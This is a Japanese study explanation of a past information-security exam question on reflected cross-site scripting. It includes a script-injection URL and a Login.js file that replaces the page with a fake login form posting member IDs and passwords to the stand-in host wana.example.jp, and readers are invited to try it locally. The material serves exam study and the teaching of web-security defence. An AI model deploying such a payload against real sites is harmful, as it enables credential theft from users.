過去問(H28SC春午後1問1)で、クロスサイトスクリプティングの例を見てみましょう。
Nさん:XSS脆弱性の影響は,警告ダイアログの表示だけではありません。例えば,攻撃者は,URLパラメタであるkeywordに攻撃用の文字列として<script src="https://wana.example.jp/Login.js"></script>を組み込んだhttps://kensho.m-sha.co.jp/Gamen2_2へのリンクを含む電子メールを作成し,被害者に送付します。被害者がそのリンクをクリックした場合,図3の画面2-2ではなく,図5のように改変された画面2-2'が表示されます。このときのhttps://wana.example.jp/Login.jsのスクリプトは,図6のとおりです。
ds
Nさん:被害者が画面2-2'でメンバIDとパスワードを入力すると,それらは[ a ]というホスト名のWebサーバに送信されます。この場合,画面2-2'が表示された時点で,被害者が偽のログインフォームだと気付くかというと,それは難しいでしょう。
J主任:なるほど。こんな被害が発生するのですね。

設問1(1) [ a ]に入れる適切な字句を、FQDNで答えよ。

この問題には前段がありますので少し補足します。以下の画面2-1のように、キーワードを入れるとその結果が画面2-2のように表示されます。
以下は、「チョコ」というキーワードを入れた画面です。
ab
右の画面2-2のURLは、https://kensho.m-sha.co.jp/Gamen2_2?keyword=チョコ です。

問題文にあるように、ここで、https://kensho.m-sha.co.jp/Gamen2_2?keyword=<script src="https://wana.example.jp/Login.js"></script> というURLのリンクを作成します。

このURLを実行するとどうなるでしょうか。
画面2-2の[ チョコ ]の部分が[ script src="https://wana.example.jp/Login.js"></script> ] と表示されるのですが、このスクリプトを実行してしまい、図5のような画面が表示されるのです。

皆さんにも体験していただきたいので、以下を実行してみてください。

作成するファイルは2つです。
1.HTMLファイル(result.htm)
<html>
<head></head>
<body>
<h1>検索結果</h1>
<script src="./Login.js"></script>を検索した結果です。
</body>
</html>

2.JSファイル(Login.js)
document.body.innerHTML = "";  // HTML body 部を全部消去する
document.write('<H1>ログイン</H1>');
document.write('M社懸賞ページへようこそ。ログインしてください。<br>');
document.write('<form name="loginForm action="https://wana.example.jp/login" method="post">');
document.write('メンバID<input type="text" name="id"><br>');
document.write('パスワード<input type="password" name="password">');
document.write('<input type="submit" name="send" value="ログイン"></form>');
この2つのファイルを同じフォルダに置いて、result.htmファイルを開いてください。画面2-2のような検索結果が出るはずが、図5の画面に書き換わっていることが分かると思います。